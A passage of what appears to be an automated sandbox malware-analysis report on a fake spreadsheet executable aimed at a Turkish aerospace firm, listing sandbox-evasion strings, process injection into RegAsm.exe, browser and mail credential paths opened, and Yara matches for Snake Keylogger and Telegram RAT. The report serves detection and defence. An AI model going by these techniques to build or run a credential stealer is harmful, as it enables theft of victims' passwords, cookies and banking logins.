Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000003.00000002.4018020786.0000000001291000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfi
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ---.cs	Reference to suspicious API methods: FindResource(moduleHandle, _320D_31CF_A9BF_321A_3208_322D_31DE_31EE, _3221_320F_3223)
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F12008	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4019025145.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
